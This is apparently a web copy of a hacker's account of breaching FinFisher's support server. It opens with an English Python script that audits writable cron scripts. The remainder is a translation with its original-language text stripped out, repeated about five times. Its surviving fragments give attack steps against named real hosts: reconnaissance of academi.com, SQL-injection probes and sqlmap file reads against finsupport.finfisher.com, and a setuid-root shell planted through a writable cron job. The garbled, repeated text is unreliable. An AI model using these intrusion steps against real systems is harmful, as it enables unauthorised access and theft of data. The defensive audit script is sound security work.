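The unix-privesc-check finding above is worth turning into a check you can run yourself. The block below is an added example, not the article's code and not unix-privesc-check itself: it reimplements that tool's cron check over file metadata, first on constructed entries matching the two warnings quoted above and, via scan_live(), on a real host. The uid/gid values are the Debian defaults for www-data and are assumptions, as are the sample modes.

```python
"""Find cron-run scripts a low-privileged user can modify.

Added example, not the article's code and not unix-privesc-check itself;
it reimplements that tool's cron check over file metadata so the logic can
be run on constructed data (the two findings quoted in the article) or on
a live host via scan_live(). The uid/gid numbers below are assumptions.
"""
import os
import stat

WWW_DATA_UID, WWW_DATA_GID = 33, 33   # Debian defaults for www-data (assumed)
ROOT_UID = 0

# Constructed metadata: (path, mode, owner uid, owner gid). The first two
# entries reproduce the misconfiguration the article found; the third is sane.
SAMPLE_CRON_FILES = [
    ("/etc/cron.hourly/mgmtlicensestatus", 0o100775, ROOT_UID, WWW_DATA_GID),
    ("/etc/cron.hourly/webalizer",         0o100777, ROOT_UID, ROOT_UID),
    ("/etc/cron.hourly/logrotate",         0o100755, ROOT_UID, ROOT_UID),
]


def writable_by(mode, owner_uid, owner_gid, uid, gids):
    """True if a process with uid/gids may write the file (root always can)."""
    if uid == ROOT_UID:
        return True
    if uid == owner_uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_cron_files(entries, uid, gids, user="www-data"):
    """Emit unix-privesc-check style warnings for cron scripts writable by user."""
    warnings = []
    for path, mode, owner_uid, owner_gid in entries:
        if not stat.S_ISREG(mode):
            continue
        if writable_by(mode, owner_uid, owner_gid, uid, gids):
            warnings.append(
                f"WARNING: {path} is run by cron as root. "
                f"The user {user} can write to {path}"
            )
    return warnings


def fix_commands(path):
    """Shell commands that close the hole: root-owned, not group/world writable."""
    return [f"chown root:root {path}", f"chmod 0755 {path}"]


def scan_live(uid, gids, user, dirs=("/etc/cron.hourly", "/etc/cron.daily",
                                     "/etc/cron.weekly", "/etc/cron.monthly")):
    """Collect real metadata from a host's cron directories and audit it."""
    entries = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            p = os.path.join(d, name)
            st = os.stat(p)
            entries.append((p, st.st_mode, st.st_uid, st.st_gid))
    return audit_cron_files(entries, uid, gids, user)


if __name__ == "__main__":
    found = audit_cron_files(SAMPLE_CRON_FILES, WWW_DATA_UID, {WWW_DATA_GID})
    for w in found:
        print(w)
        print("  fix:", "; ".join(fix_commands(w.split()[1])))
```

The remediation is the inverse of the attack: the script must be owned by root and must not be group- or world-writable, and the same applies to the directory that holds it, since a writable directory lets an attacker replace the file rather than edit it. The script does not model the timing detail from the story; run-parts fires on the schedule in /etc/crontab and in the server's own time zone, which is why the article's ls -l /etc/localtime mattered.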
The next question is always what the compromised host can reach. Run nmap from the server against the adjacent networks, with the nse scripts nfs-* and smb-*, to find file shares and Windows hosts. In this case finsupport turned out to be a stand-alone web server with no route into Gamma's internal network; besides the web application it held a qateam account and its material, and what was on that server is what went into the dump.
What the dump contains, in short: Gamma's FinSpy documentation and release notes; a description of the FinSpy C&C architecture, in which the agent does not talk to the real C&C directly but through relay proxies, so that what a victim can see is a relay and never the FinFisher C&C itself; DDoS-related material for that infrastructure; and Gamma Group's price lists and customer records.

Gamma's customer list, FinSpy price lists and screenshots of the documentation were published through a Twitter account created for the purpose.

One item is still closed: the password-protected archive FinSpy-PC+Mobile-2012-07-12-Final.zip (distributed by magnet link, 38.7 GB). Anyone with a GPU and time to spare is invited to crack it.
A few conclusions, for those on the receiving end of this kind of software.

1) The way in is almost always the same: the browser, Java, Flash, or a Microsoft Office document that arrives as an email attachment. Keep all of them updated and, better still, remove Java and Flash altogether.

Gamma does have 0day exploits for these (its FinSploit catalogue, with exploits bought from VUPEN), but that is the exception rather than the rule. For the typical target an unpatched browser or Flash plugin is enough, and a Metasploit browser autopwn does the same job as the expensive exploit kit.

2) By the author's estimate, around 95% of successful intrusions rely on such basic oversights, not on 0days. None of the defences are glamorous or difficult, and they close most of the doors FinFisher depends on.

All 40 GB of the dump were published, with a PGP-signed announcement, and mirrored on GitHub: https://github.com/FinFisher .
Where to learn this properly. Follow Hacker News and Reddit, and work through:

https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (a collection of further resources)
https://www.corelan.be/ (start with Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/

Books:

The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
